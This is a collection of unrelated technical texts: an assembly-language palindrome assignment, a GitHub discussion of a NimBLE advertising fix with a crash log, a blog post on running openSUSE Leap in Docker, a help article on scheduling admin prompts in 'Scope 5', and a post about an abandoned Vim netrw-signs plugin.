I never had any problem with Vista but the upgrade made it better. March 15, 2011 sriTHEradical why should i change to IE .i am been using FF4,its is awesome March 15, 2011 rinso If IE9 doesn't work with XP,where does that leave those Users' computers can then be configured to receive updates directly from one or more WSUS servers rather than through Windows Update. http://isospanplus.com/internet-explorer/internet-explorer-9-for-windows-7-64-bit.html Spoiler alert: If you are running Windows 7 or Vista, you should absolutely install IE9 on your PC—even if you prefer Chrome or Firefox, it’s better to have a secure, updated
That’s why you should always install a color profile that’s suited for your display. Update Internet Explorer For Vista For curiosity's sake, I decided to install IE9 just to see what it was like. For instance, I found both set to use proxies recently, even though I don't have any proxies on my home network.
So… I'll update when Microsoft compels me to. I'm typing this message in Chrome; I'm just starting to try Chrome again. You do not need add-on or extension like FF4 and Chrome because software can work great on Windows7 far more than add-on or extension alone. Update Internet Explorer For Windows Xp March 15, 2011 Seasider OK, creepy or what.
Be sure to save all of you ongoing work and then, press the Restart now button. See also: Windows XP support has ended; what to do now Internet Explorer 8, 9, 10 support has ended: Check your version To be clear, the latest version of Internet Explorer Personally, I prefer google than microsoft so I use Chrome and I'm pretty satisfied with that efficient and clean looking browser. The result: When you click that new shortcut that you saved on your desktop, it will always be opened by explorer even if you already set "Firefox" or "Chrome" as your
IE9 Will NOT work with XP? March 15, 2011 Atul IE9 is nice and has a memory footprint comparable to Chrome if not better. looks like i'll have to change to accommodate modernity. Language packs for Internet Explorer 9 are available for download at the links below.
Your computer will restart and Internet Explorer 9 will be available for use. Google Chrome adds them as buttons alongside the address line and the buttons can be hidden without disabling the addon. I do however wish Chrome could reduce the amount of memory that goes into powering their browser. March 16, 2011 Adil Hasan Mhaisker I installed IE9 today (don't ask why), and again, trying to dominate, the Micro$oft even changed the default search in my Firefox from "google" to
The Vista IE9 installer available from MS appears to start in on Windows 7 SP1 in Vista SP2 compatibility mode but complains about needing an upgrade. That's is like OS for many apps For FF4 it's best browser nowadays unlike FF3.6.xx that limited performance if you install many add-on like me (20 add-on more). March 15, 2011 JackH It's quite good, but firefox 4 RC stilll feels faster on mp Win7 pc March 15, 2011 Thibault Whats this guy talking about windows 7 bad.
|
OPCFW_CODE
|
I am trying to set up a watch folder in PSE11 over a homegroup network but each time I do it get an error " access denied" what is the correct protocal for doing this?
Watched folders are implemented by a Windows service that normally runs in the Local System account and doesn’t have access to your logon credentials, which could be needed to access the network drive.
To change the logon of the service, go to the Control Panel and open Services. Select Adobe Active File Monitor V11 and click the Properties button. On the Logon tab, change to “This account” and enter the name of your account (on the computer that runs PSE) and its password.
Alos, make sure you are using UNC syntax (\\mycomputer\photos) rather than a drive letter to specify the folders to be watched
Okay thank you for the suggestions above: As they were helpful, and similar to what I had found online earlier in the morning, but as with the information I found online there were a couple of things missing that might help anyone else looking to figure this out:
First I am working on a Windows 7 OS with a homegroup network
A hint finding the Services in the Control Panel is not as straight forward as one might like it to be: So another option is to click the windows icon on your desktop and in the search box type services.msc note as you start typing services the option to select the services shows up in the results window. This is discribed in the blog post above.
For this example I will use C1 as Computer 1 the storage/host computer and C2 as the remote laptop (where I want to set the watch folder back to C1):
After joining both C1 and C2 to my homegroup network I wanted to create a watch folder in PSE11 on C2 back to C1
Since the two computers were joined on the homegroup network using the UNC syntax was not a problem since they could see each other and I could navigate to the folder I wanted to set as my Watch Folder on C2 the syntax was defined automatically:
And the solutions as mentioned above by changing the setting in the Logon Tab under the Services. -->Adobe Active File Monitor V11, work just fine:
But what is not clear is this:
Since I am trying to create the Watch folder in C2 back to C1 and the message I get on C2 is "access is denied" then it only seemed logical to me (of course this is just me) that I needed to change the settings on C1 so that C2 could access it
But this is not the case:
the change of setting needs to be on on C2 the remote computer not the host or Storage computer C1.
Once that change is made per the instructions above everything should work out fine after you do a restart on the computer
Hope this helps anyone else who was having this problem.
|
OPCFW_CODE
|
I am happy to announce that we have the new release of Debian Stretch Desktop Image armhf.
Main features list as below:
- Linux kernel 4.4
- Mali GPU driver&libmali r14p0
- xserver-xorg-video-armsoc version 1.9.3
- chromium with WebGL support
- ffmpeg 3.4.1 with Rockchip patches
- fix hdmi audio issue
- mpv 0.28 with Rockchp patches
- LS header buses exported by default
- support libmraa
and many more…
Download link: dl.vamrs.com
Debian Strech desktop image for rock960
This image can be write to SD card or flashed to the on board eMMC and boot on rock960 model A and model B boards.
- rk3399_loader_v1.12.112.bin - pre-built bootloader for flash from USB
- rock960-model-ab-debian-lxde-armhf-20180814_2020.img - combined image for u-boot, atf, kernel and rootfs
- username: linaro
- password: linaro
SD Card Install
sudo dd if=rock960-model-ab-debian-lxde-armhf-20180814_2020.img of=/dev/sdx bs=4M
Quick instructions of how to flash to eMMC
Install rkdeveloptool on Linux desktop from https://github.com/rockchip-linux/rkdeveloptool
Boot rock960 to maskrom mode with the following
- power on rock960
- plug the rock960 to Linux desktop with USB type A to type C cable
- press and hold the maskrom key, then short press reset key
- release maskrom key
Run the following command to start flash:
rkdeveloptool db rk3399_loader_v1.12.112.bin
rkdeveloptool wl 0 rock960-model-ab-debian-lxde-armhf-20180814_2020.img
rkdeveloptool rd #reset the board
The board will boot to the new flashed image.
Can not go to maskrom mode
Press and hold maskrom key longer, and short press and release reset.
Check your usb cable, plug and unplug the usb cable, reverse plug the type C port and try
On the host PC, lsusb should show the following VID/PID if the board is in maskrom mode:
Bus 003 Device 061: ID 2207:0011
If you have issue with the image or flashing, please reply in this thread.
|
OPCFW_CODE
|
Internet Routing. What is an autonomous system? What is the difference between an interior routing protocol and an exterior routing protocol? Compare the three main approaches to routing. Name a protocol used in each approach.
An Implementation of Parallel Computing for Hierarchical Logistic Network Design Optimization Using PSO 1. An Implementation of Parallel Computing for Hierarchical Logistic Network Design Optimization Using PSO. Yoshiaki Shimizua, Hiroshi Kawamotoa.
CCNA Security. CCNA Security. Chapter 6 Lab A, Securing Layer 2 Switches Instructor Version. IP Addressing Table. Part 1: Configure Basic Switch Settings. Build the topology. Configure the host name, IP address, and access passwords. Part 2: Configure SSH Access to the Switches.
PROTOCOL TITLE. DF/HCC NON-CLINICAL PROTOCOL TEMPLATE. INSTRUCTIONS FOR INVESTIGATOR-WRITTEN PROTOCOLS. This template contains DF/HCC recommended language for protocol development. It is derived from federal requirements and DF/HCC policies and procedures.
CLUSTER ARCHITECTURES: An overview of state of art cluster architectures. VENKATA KIRITI MUNGANURU. Information Technology (IT) organizations are under increasing pressure to provide access to applications and data around the clock with minimal scheduled.
Packet Tracer Multiuser - Implement Services. Packet Tracer Multiuser - Implement Services. Addressing Table. Part 1: Establish a Local Multiuser Connection to another Instance of Packet Tracer. Part 2: Server Side Player - Implement and Verify Services.
Setting up VPN. Click on the Start Button and right click on My Network Places and choose Properties. Click on File and then New connection and you should see the following window. On the next screen, click Connect to the network at my workplace.
IFN503 Assessment 2 (Deliverable 2). Project (Research/Applied) 100 Marks. Due Date: Wednesday 25th October 2017 by 5 pm. Section 1 (Research). The TCP/IP protocols are the heart and soul of the Internet, and they describe the fundamental rules that govern.
Arduino GSM Shield. The GSM library is included with Arduino IDE 1.0.4 and later. The Arduino GSM Shield connects your Arduino to the internet using the GPRS wireless network. Just plug this module onto your Arduino board, plug in a SIM card from an operator.
No Configurations for Scenario 10-1 thru Scenario 10-4. Scenario 10-5 Configuration Part 1 (SPAN). Scenario 10-5 Switch-A Configuration Part 1 (SPAN). hostname Switch-A. enable secret cisco. vtp mode transparent. monitor session 1 source interface fastEthernet0/2 both.
H685p 3G HSPA+ Router Datasheet. H685p 3G HSPA+ Router Datasheet. > Product Introduction. The H685p 3G HSPA+ Cellular Router designed for establish a 2G + 3G WCDMA cellular and Wi-Fi wireless network and share a cellular broad band Internet connection.
URN generator. Apache XML Beans library. Parser/validator. Grouping validator. XSLT transforms library. Metadata storage systems. Policy manager. Encryption tools. Canadian Research Data Centres Network. Danish Data Archive. UK Data Archive. Open Data Foundation.
2.1.txt (7.6 kB) 2.2.txt (8.0 kB) 2.3.txt (9.2 kB) 2.4.txt (8.8 kB) 2.5.txt (7.4 kB) 2.6.txt (13.4 kB) 2.8.txt (6.5 kB) 2.9.txt (10.5 kB) 2.10.txt (9.3 kB) 2.11.txt (11.7 kB) 2.0.Final.txt (33.6 kB) 2.0.PFinal.txt (27.1 kB) test L6.txt (13.0 kB) test.
XGS-5610ST Unmanaged 10GbE Switch. XGS-5610ST Unmanaged Switch is a plug-and-play 10GbE Ethernet Switch product line offering 10G copper and fiber connections in a small form factor. With the enormous growth of network traffic and network storage in recent.
Connecting and Configuring a Tax-Aide Network Printer. Network printers can connect to a router either hard wired with an Ethernet cable, wirelessly, or either. USB only printers connect directly to a laptop or desktop computer. 1. Connect the Network printer to your router.
FUNDAMENTAL NETWORKS. Increased productivity. Fewer peripherals needed. Increased communication capabilities. Avoid file duplication and corruption. Centralized administration. Conserver resources. No centralized administration. No centralized security.
|
OPCFW_CODE
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Data;
using System.Reflection;
using tr.mustaliscl.data;
using System.Data.SqlClient;
using tr.mustaliscl.math;
using System.ComponentModel;
using tr.mustaliscl.metinsel;
namespace tr.mustaliscl.data
{
public class Data
{
public static DataTable ToDataTable<T>(IList<T> data)
{
PropertyDescriptorCollection properties =
TypeDescriptor.GetProperties(typeof(T));
DataTable table = new DataTable();
foreach (PropertyDescriptor prop in properties)
table.Columns.Add(prop.Name, Nullable.GetUnderlyingType(prop.PropertyType) ?? prop.PropertyType);
foreach (T item in data)
{
DataRow row = table.NewRow();
foreach (PropertyDescriptor prop in properties)
row[prop.Name] = prop.GetValue(item) ?? DBNull.Value;
table.Rows.Add(row);
}
return table;
}
public static IList<T> DataTableToList<T>(DataTable datatable) where T : new()
{
try
{
/*
if(properties.Count!=datatable.Columns.Count)
throw new Exception("Column Count andProperties Count must be Equal.";
*/
List<T> liste = new List<T>();
foreach (DataRow row in datatable.Rows)
{
T item = new T();
PropertyDescriptorCollection properties =
TypeDescriptor.GetProperties(typeof(T));
foreach (DataColumn col in datatable.Columns)
{
object obj = row[col.ColumnName];
if (null != obj && obj != DBNull.Value)
{
PropertyDescriptor prop = properties.Find(col.ColumnName, true);
prop.SetValue(item, obj);
}
}
liste.Add(item);
}
return liste;
}
catch (Exception exc)
{
throw exc;
}
}
public DataSet CreateDataSet<T>(List<T> list)
{
//list is nothing or has nothing, return nothing (or add exception handling)
if (list == null || list.Count == 0) { return null; }
//get the type of the first obj in the list
var obj = list[0].GetType();
//now grab all properties
var properties = obj.GetProperties();
//make sure the obj has properties, return nothing (or add exception handling)
if (properties.Length == 0) { return null; }
//it does so create the dataset and table
var dataSet = new DataSet();
var dataTable = new DataTable();
//now build the columns from the properties
var columns = new DataColumn[properties.Length];
for (int i = 0; i < properties.Length; i++)
{
columns[i] = new DataColumn(properties[i].Name, properties[i].PropertyType);
}
//add columns to table
dataTable.Columns.AddRange(columns);
//now add the list values to the table
foreach (var item in list)
{
//create a new row from table
var dataRow = dataTable.NewRow();
//now we have to iterate thru each property of the item and retrieve it's value for the corresponding row's cell
var itemProperties = item.GetType().GetProperties();
for (int i = 0; i < itemProperties.Length; i++)
{
dataRow[i] = itemProperties[i].GetValue(item, null) ?? DBNull.Value;
}
//now add the populated row to the table
dataTable.Rows.Add(dataRow);
}
//add table to dataset
dataSet.Tables.Add(dataTable);
//return dataset
return dataSet;
}
public static DataSet Procedure2DataSet(String ConnStr, String procedureName, params Param[] parameters)
{
DataSet dS = new DataSet();
using (SqlConnection conn = new SqlConnection(ConnStr))
{
using (SqlCommand cmd = conn.CreateCommand())
{
cmd.CommandType = CommandType.StoredProcedure;
cmd.CommandText = procedureName;
if (parameters != null && parameters.Length > 0)
{
for (int i = 0; i < parameters.Length; i++)
{
if (!string.IsNullOrEmpty(parameters[i].Name))
{
cmd.Parameters.Add(
parameters[i].Name, parameters[i].Tip).Value =
parameters[i].Value;
}
}// end for
}//end if
conn.Open();
SqlDataAdapter sqDa = new SqlDataAdapter();
sqDa.SelectCommand = cmd;
sqDa.Fill(dS);
}//end sql command
conn.Close(); SqlConnection.ClearPool(conn);
}//end connection
return dS;
}
public static DataTable Procedure2DataTable(String ConnStr, String procedureName, params Param[] parameters)
{
using (DataSet dS = Procedure2DataSet(ConnStr, procedureName,
parameters))
{
DataTable dT = null;
try
{
dT = dS.Tables[0];
}
catch (Exception)
{
dT = null;
}
return dT;
}
}
protected static String SinifAdi(Object o)
{
return o.GetType().Name;
}
protected static Int32 Identity(String ConnStr, String tableName)
{
int retInt = 0;
using (SqlConnection conn = new SqlConnection(ConnStr))
{
using (SqlCommand cmd = conn.CreateCommand())
{
cmd.CommandText = "SELECT IDENT_CURRENT(@TableName)";
cmd.Parameters.AddWithValue("@TableName", tableName);
conn.Open();
Object o = cmd.ExecuteScalar();
retInt = o.ToString().ToInt();
cmd.Parameters.Clear();
conn.Close();
}//end sql command
SqlConnection.ClearPool(conn);
}//end sql connection
return retInt;
}
/// <summary>
/// Tablo ismini kullanıp son Id numarasını döndürem fonksiyon.
/// </summary>
/// <param name="ConnStr">Bağlantı metni</param>
/// <param name="table">Tablo isminin olduğu sınıfı #new Tablo()# şeklinde girmeniz gerekmektedir...</param>
/// <returns>/// Tablo ismini kullanıp son Id numarasını döndürür.</returns>
public static Int32 GetIdentity(String ConnStr, Object table)
{
return Identity(ConnStr, SinifAdi(table));
}
/// <summary>
/// Tek tabloda silme işlemini yapan kod.
/// </summary>
/// <param name="ConnStr">Bağlantı metni</param>
/// <param name="tablo_adi">tablo adı</param>
/// <param name="kolon_adi">kolon adı</param>
/// <param name="deger">sorgulanan değer</param>
/// <returns>silinen satır sayısı döner, İstisna oluşursa
/// ArgumentNullException da -4,
/// FormatException da -3,
/// SqlException da -2,
/// InvalidOperationException da -1 dönecektir.
/// </returns>
public static int Sil(String ConnStr, string tablo_adi, string kolon_adi, object deger)
{
Int32 retInt = 0;
try
{
using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(ConnStr))
{
using (System.Data.SqlClient.SqlCommand cmd = conn.CreateCommand())
{
cmd.CommandType = CommandType.Text;
cmd.CommandText = String.Format("DELETE FROM {0} WHERE {1}=@deger;", tablo_adi, kolon_adi);
cmd.Parameters.AddWithValue("@deger", deger);
conn.Open();
retInt = cmd.ExecuteNonQuery();
conn.Close();
cmd.Parameters.Clear();
}
SqlConnection.ClearPool(conn);
}
}
catch (System.ArgumentNullException) { retInt = -4; }
catch (System.FormatException) { retInt = -3; }
catch (System.Data.SqlClient.SqlException) { retInt = -2; }
catch (System.InvalidOperationException) { retInt = -1; }
return retInt;
}
public static DataSet Query2DataSet(String ConnStr, String query, params Param[] parameters)
{
DataSet dS = new DataSet();
using (SqlConnection conn = new SqlConnection(ConnStr))
{
using (SqlCommand cmd = conn.CreateCommand())
{
cmd.CommandType = CommandType.Text;
cmd.CommandText = query;
if (parameters != null && parameters.Length > 0)
{
for (int i = 0; i < parameters.Length; i++)
{
if (!string.IsNullOrEmpty(parameters[i].Name))
{
cmd.Parameters.Add(
parameters[i].Name, parameters[i].Tip).Value =
parameters[i].Value;
}
}// end for
}//end if
conn.Open();
SqlDataAdapter sqDa = new SqlDataAdapter();
sqDa.SelectCommand = cmd;
sqDa.Fill(dS);
}//end sql command
conn.Close(); SqlConnection.ClearPool(conn);
}//end connection
return dS;
}
public static DataTable Query2DataTable(String ConnStr, String query, params Param[] parameters)
{
using (DataSet dS = Query2DataSet(ConnStr, query,
parameters))
{
DataTable dT = null;
try
{
dT = dS.Tables[0];
}
catch (Exception)
{
dT = null;
}
return dT;
}
}
}
}
|
STACK_EDU
|
It was after talking with Mark Madsen at Strata that the idea of Consilience really took hold. (At that point, I didn’t know the word, just the idea). There were various iterations of the idea using words such as ‘interoperable’ and ‘compose-able’ but there was nothing satisfying enough to make the idea stick.
It finally all came together one evening talking to Nick Harkaway on Twitter to quote “@CodeBeard (Interesting word here might be “consilient”)”.
The word Consilient is usefully defined as ‘the principle that evidence from independent, unrelated sources can “converge” to strong conclusions’. It was the title of a book by E.O. Wilson in discussion of the unification of science.
Consilience literally means ‘jumping together’.
At DataShaka we are focused on solving the Variety problem within data. Our TCSV methodology results in one, single, unified set of data. TCSV can be combined together regardless of source or source format. TCSV from multiple sources, when combined together, create a valid unified set.
TCSV is consilient.
It turns out that consilience in data is unusual. This is because of the content specificity built in to most data formats, storage and methodologies. Only data content that fits within the known ‘Schema’ is valid. Data from outside of the schema is invalid.
Two sets of schema bound data are therefore not consilient.
When a schema is built around data content and that schema is used to define a data structure, the data structure is known as ‘content specific’. Content specific data structures are everywhere within software development and data systems. Relational Databases, and spreadsheets, are built from tables where the column headings and table relationships define the data structure. A JSON document is content specific when the keys (of a key value pair) contain data content. Similarly, XML is content specific when the node and attribute names contain data content.
Content specificity precludes consilience.
Content agnosticism is the philosophical opposite of content specificity. A content agnostic data structure pushes data content to the value level and uses ‘something else’ to define the structure of the data.
In the case of the TCSV ontology, it is Time, Content, Signal and Value that is the ‘something else’ used to define the structure of the data.
Tables, JSON and XML can all be used in a content agnostic way. When you adopt a content agnostic approach (apart from having to fight with the content specificity built in to a large amount of available software) the challenge of variety becomes much easier to tackle.
Content agnosticism promotes consilience.
Why is consilience in data important?
Data is not a new phenomenon, and Big Data as a ‘naming of parts’ has done great things for promoting the data agenda within organisations. Data as a route to learning promotes organisational learning, which is understood by many to be an organisational imperative.
While solving for the sheer amount (Volume) or speed (Velocity) of data, Big Data has left by the wayside the problem of Variety. Variety is thrown up from both the acquisition end of a data system and also the business questions end.
At the acquisition end of a data system, the struggle of change management is the most well understood form of the Variety challenge within Big Data. Consilience helps here because, with a truly consilient data ecosystem, data acquisition is easy. Data from multiple sources can be unified as a mater of course. Because of this, a data system becomes increasingly flexible and helpful to a user.
Consilience makes many of the traditional ETL process redundant.
At the other end, when a user queries a data system built around consilience they are not frustrated by the ‘edges’ of the system that limit what they can find out. The user is only limited by the range of data collected, and with a consilient data ecosystem, requesting new data does not represent a burden on the data system.
Consilient data that becomes a unified Chaordic set is able to fulfill a user’s data need on the users terms, not on some historically designed terms of the data system.
In this modern (Big Data), connected (Smartphones), advertising ridden (Facebook, Twitter, Google) world, where the Internet of Things means devices from your watch and fridge to your thermostat and house plants spit out data, the challenge of bringing data together to a valuable end will become increasingly difficult unless this data is consilient.
Data held in TCSV (our Content Agnostic Master Ontology) is fully concilient. Regardless of source, two sets of TCSV work together as one unified set.
Consilient data is one part of the 3Cs which make up the Next Phase of Data. Read more about the Next Phase of Data here.
If you would like to know how we can help make your data ‘jump together’, get in touch! I will also be speaking on stage at the Big Data Week on Tuesday 7th May, so come and grab me afterwards.
|
OPCFW_CODE
|
Introduction: Our predictive parser uses an e-production as a default when no other production can be used. With the input of Fig. 2.18, after the terminals for and (are matched, the lookahead symbol is ;. At this point procedure optexpr is called, and the code
if ( lookahead === expr ) match (expr);
in its body is executed. Nonterminal optexpr has two productions, with bodies expr and e. The lookahead symbol ";" does not match the terminal expr, so the production with body expr cannot apply. In fact, the procedure returns without changing the lookahead symbol or doing anything else. Doing nothing corresponds to applying an e-production.
More generally, consider a variant of the productions in Fig. 2.16 where optexpr generates an expression nonterminal instead of the terminal expr:
optexpr —>• expr
Thus, optexpr either generates an expression using nonterminal expr or it generates e. While parsing optexpr, if the lookahead symbol is not in FIRST (espr), then the e-production is used.
Designing a Predictive Parser: We can generalize the technique introduced informally in Section 2.4.2, to apply to any grammar that has disjoint FIRST sets for the production bodies belonging to any nonterminal. We shall also see that when we have a translation scheme — that is, a grammar with embedded actions — it is possible to execute those actions as part of the procedures designed for the parser.
Recall that a predictive parser is a program consisting of a procedure for every nonterminal. The procedure for nonterminal A does two things.
1. It decides which A-production to use by examining the lookahead symbol. The production with body a (where a is not e, the empty string) is used if the lookahead symbol is in FiRST(a). If there is a conflict between two nonempty bodies for any lookahead symbol, then we cannot use this parsing method on this grammar. In addition, the e-production for A, if it exists, is used if the lookahead symbol is not in the FIRST set for any other production body for A.
2. The procedure then mimics the body of the chosen production. That is, the symbols of the body are "executed" in turn, from the left. A nonterminal is "executed" by a call to the procedure for that nonterminal, and a terminal matching the lookahead symbol is "executed" by reading the next input symbol. If at some point the terminal in the body does not match the lookahead symbol, a syntax error is reported.
Just as a translation scheme is formed by extending a grammar, a syntax directed translator can be formed by extending a predictive parser. An algorithm for this purpose is given in Section 5.4. The following limited construction suffices for the present:
1. Construct a predictive parser, ignoring the actions in productions.
2. Copy the actions from the translation scheme into the parser. If an action appears after grammar symbol X in production p, then it is copied after the implementation of X in the code for p. Otherwise, if it appears at the beginning of the production, then it is copied just before the code for the production body.
Left Recursion: It is possible for a recursive-descent parser to loop forever. A problem arises with "left-recursive" productions like
expr —y expr term
where the leftmost symbol of the body is the same as the nonterminal at the head of the production. Suppose the procedure for expr decides to apply this production. The body begins with expr so the procedure for expr is called recursively. Since the lookahead symbol changes only when a terminal in the body is matched, no change to the input took place between recursive calls of expr. As a result, the second call to expr does exactly what the first call did, which means a third call to expr, and so on, forever. A left-recursive production can be eliminated by rewriting the offending production. Consider a nonterminal A with two productions
A ->• Aa | /3
where a and /3 are sequences of terminals and non-terminals that do not start with A. For example, in
expr —y expr term \ term
nonterminal A — expr, string a = term, and string (3 = term
The nonterminal A and its production are said to be left recursive, because the production A -> Aa has A itself as the leftmost symbol on the right side. Repeated application of this production builds up a sequence of a ' s to the right of A, as in Fig. 2.20(a). When A is finally replaced by /3, we have a /3 followed by a sequence of zero or more a's.
|
OPCFW_CODE
|
Top &39; Set the Minimum, Maximum, and initial Value. It is not practical to use a 30+ parameter to retrieve form data. For example, suppose a control has its NeededPermission property set to Update. I am instnatiating a second form from a first form. Specify the initial sizing of the datafiles section of the control file at CREATE DATABASE or CREATE CONTROLFILE time.
type Indicates the type of input control and for text input control it will be set to text. ItemData(0) Our example database contains a form with a ComboBox containing ProductCategories, and a ListBox containing Products. For example, you might want to fill in a username field with the username of the current session. If you want to display the default selected value within the Combo box control in the Gallery control before interacting with the control, I afraid that there is no way to achieve your needs in PowerApps currently.
Hence to use setValue(), we need to pass array that must match the structure of the control completely. This argument, if given, should be a dictionary mapping field names to initial values. Then you can use it directly in code, e. When you need to create an instance or collect information. Then on the click event of a button on form1 I have Dim frm = New form2, frm. It&39;s not about the problem you have right now, but you can also have several controls for a single field and so on.
I set startuplocation to manual, then I enter 100 for X and 300 for Y on the second form. It&39;s variables generated by framework, like __VIEWSTATE or __EVENTVALIDATION. Can someone give me an example of getting the value from the form collection? Ctrl("The Form where the control is on", "the name of the control") Real world examples;. I have made a test on my side, please take a try with the following workaround: Set the DefaultDate property of the DatePicker control within the Due Date Data card to following:. Do not edit form controls or run FormTyper on a form with active XFA controls.
The default value is a multiple of the MAXINSTANCES value and depends on your operating system. Note: When you change the Text property value of a form (or other control), PowerShell Studio and PrimalScript automatically rename the variable that stores the form object. Consider a robotic arm that can be moved and positioned by a control loop. Selected value is Asia and it is the fourth (4) value in list F1:F6. This sometimes breaks data integrity when the user edits the record and the drop down users value gets lost on the edit form.
Form Launches form properties dialog box, controlling properties for the form as a whole, such as which data source it connects to. To understand example first few methods to know. value This can be used to provide an initial value inside the control. And no it&39;s not a standard user-defined form variables that come from text input fields. To replace the blank value, use this syntax to set the value of the control to the first item (assumes Column Heads is set to No): Me. The minimum value is 0.
We will learn how to set the default or initial value to form controls, dynamically set values, reset the value of the form, etc. Once the DateTimePicker control is ready with its properties, the next step is to add the DateTimePicker to a Form. Validation – Allows a check to be performed on the field when the user tries to save the form. By the way, consider using RealEdit instead of StringEdit controls; it makes better sense for numbers. Dealing with user input is a very common task in any Web application or Web site. Learn how to set the value of individual FormControl or a FormGroup and nested FormGroup.
Basically, using that same logic, with having the varStatus, you need to know the name of the control that the value is in, then set the variable. html ="form-control" formControlName="publishdate" ngbDatepicker datepicker=. Allows to specify the width of the text-input control in terms of. Used to give a name to the control which is sent to the server to be recognized and get the value. Text Value Property This property set/return the value of value attribute of a text field. FormArray patchValue() patchValue() patches the value of FormArray.
an instruction for filling in that particular field. To prevent the validator from displaying errors before the user has a chance to edit the form, you should check for either the dirty or touched states in a control. Make sure the form&39;s &39;StartPosition&39; property is set to &39;Manual&39;. size Allows to specify the width of the text-input control in terms of characters.
Here are a few examples discussed. Indicates the type of input control and for text input control it will be set to text. Here’s the result. To specify dynamic initial data, see the Form. It links the relative position of selected value (4) in a list, here it is linked to cell D2. An electric motor may lift or lower the arm, depending on forward or reverse power applied, but power cannot be a simple function of position because of the inertial mass of the arm, forces due to gravity, external forces on the arm such as a load to lift or work to be done on an external object. So if you don&39;t manually select a value from the Combo box control, the ComboBox1. You can label the box.
Control Launches form control properties dialog box. I can&39;t set the initial value of a datepicker that is bound to an input. This dialog box can be kept open as different controls are selected. In this post your will learn how to set the drop down default value in PowerApps. So I think I need to use the use a regular input field and use the form form control set initial value manually collection to get the value while specifying another action. Initial Value – This is used for pre-populating a field with a value – e. If a form control is bound to a table field, you should always work with the data source and not with the form control directly.
Use the setValue () method to set a new value for an individual control. The initial argument lets you specify the initial value to use form control set initial value manually when rendering this Field in an unbound Form. Using an Append Query to Set the Initial Value of a Microsoft Access AutoNumber Field: By using an append query, you can change the starting value of an AutoNumber field in a table to a number other than 1. on each form that you want to access controls of other forms, declare a FindControl object: FindControl fc = new FindControl (); Now if you want to access the Text property on a TextBox control of another form you simply call: FindControl.
This blog post shows you how to manipulate List Boxes (form controls) manually and with vba code. Maximum = 2500 numericUpDown1. When the user changes the value in the watched field, the control is marked as "dirty".
Receive Form Data using StudentModel class. But form2 shows up way to the right of the screen. As an alternative solution, you could set the Default value for corresponding fields in the Edit form of your app directly.
Selectd formula would return empty. See also: Form Preferences and the Form Controls Panel. Microsoft Access always numbers AutoNumber fields beginning with the number 1. JQuery val() method: This method return/set the value attribute of selected elements. The value attribute specifies the value of an element. Use the patchValue () method to replace any properties defined in the object that have changed in the form model.
To accomplish this, use the initial argument to a Form. MAXDATAFILES Clause. The assignment is extremely simple - just use DatasourceName. This article leads you through basic concepts and examples of client-side. Using these form controls in excel we can create a drop-down list in excel, list boxes, spinners, checkboxes, scroll bars. Add(numericUpDown1) End Sub &39; Check box to toggle decimal places to be displayed.
The maximum value is limited only by the maximum form control set initial value manually size of the control file. Use initial to declare the initial value of form fields at runtime. Better yet would be to use the model and allow for it to be initially null.
Add method that adds DateTimePicker control to the Form controls and displays on the Form based on the location and size of the control. Before submitting data to the server, it is important to ensure all required form controls are filled out, in the correct format. We need to pass an array to patchValue() that should match the structure of control either completely or partially. Use the setValue () method to set a new value for an individual control. initial parameter. . Syntax: Return the value property: textObject. ControlName = Me.
Or, set the value of the Text property of the form in the script. The list box shows you a number of values with a scroll bar (if needed). High performance Form component with data scope management. To do so, we use Form. To set value to text2, set its AutoDeclaration property to Yes. name Used to give a name to the control which is sent to the server to be recognized and get the value. This can be used to provide an initial value inside the control. The standard way to do it is through HTML forms, where the user input some data, submit it to the server, and then the server does something with it.
Excel Form Controls are objects which can be inserted at any place in the worksheet to work with data and handle the data as specified. The value property contains the default value, the value a user types or a value set by a script. Excel Form Controls. Minimum = - 100 &39; Add the NumericUpDown to the Form. . Drop down controls are used in almost all PowerApps and often times I can spot a rookie app when the users previous choices are not persisted.
In previous method, Model Binder works great if you have a form with 3 or 5 controls but what if you have a form with 30+ controls. This is called client-side form validation, and helps ensure data submitted matches the requirements set forth in the various form controls. The value attribute is used differently for different input types: For "button", "reset", and "submit" - it defines the text on the button. Check Box A box that can be selected or deselected on the form.
Value = 5 numericUpDown1. When the user blurs the form control element, the control is marked as "touched".
-> Anydesk ios manual
-> Dockmaster training manual
|
OPCFW_CODE
|
This is a discussion on Dell Monitor within the Other Hardware Support forums, part of the Tech Support Forum category. Hello,
I have an older Dell 17" monitor and last night it stated flickering. Now it is completely black but
I have an older Dell 17" monitor and last night it stated flickering. Now it is completely black but it is still flickering. The power button is flashing on and off. Is this monitor shot? Or is it just need some kind of reset?
OS: WinXP Pro SP2; Windows Server 2003; Windows Vista Ultimate; Vista Business
It is likely the monitor going bad. However, to be sure, try plugging it into another working computer just to make sure it is not a problem with your video card. If the monitor doesn't work on the other computer, it's shot. If it does, then you need to look at your video card.
It is hard to fail, but it is worse never to have tried to succeed.
It definitely sounds like either a dying monitor or video card. I second PanamaGal's suggestion of trying the monitor on another computer. If you have one I also recommend trying another monitor that works on this computer (verifies where the problem is).
Dell monitors have a three year manufacturers warranty, so if it is not over three years old you could call Dell support (or PM me) and a replacement could be set up. If you are not sure how old it is, just send me the serial number off back and I'll be happy to look it up.
Second monitor issue Hi folks, I am trying to use a hook up a second monitor to my pc the 2nd monitor is 10". when I hook up a 15" of greater as a second monitor it works ok but when i hook up the 10" monitor I am having trouble getting the display up on the 10" monitor. Now all I get is the wallpaper but when i move a...
Video Card Support
03-10-2007 08:51 AM
Where to begin? I have been having all sorts of problems with my computer, and it just seems to be getting worse. I apologize if I'm not posting this in the right spot, but I honestly don't know where to start because there seems to be a variety of issues, and I don't know where they are all stemming from. I...
Resolved HJT Threads
02-21-2007 01:08 PM
dell e1505 laptop with 24 inch monitor? the 2407wfp is a 24 inch monitor from dell also. I was wondering if i would have any problems running this setup. I ordered the laptop with the 256MB NVIDIA® GeForce™ Go 7300 GS. Will this card be able to support WUXGA resolution (1920x1200)?
Video Card Support
02-17-2007 07:18 PM
[b]computer Stupidities[/b] You'd think people would realize that a monitor is similar to a TV. It receives a signal that represents an image, then displays said image.
Tech Support: "Please click on the 'start' button."
|
OPCFW_CODE
|
I'm working on a assembly language multi-part question and need an explanation and answer to help me learn.
Using Irvine32.io library and MASM solve the assignment
Requirements: just minimum documentation | .doc file
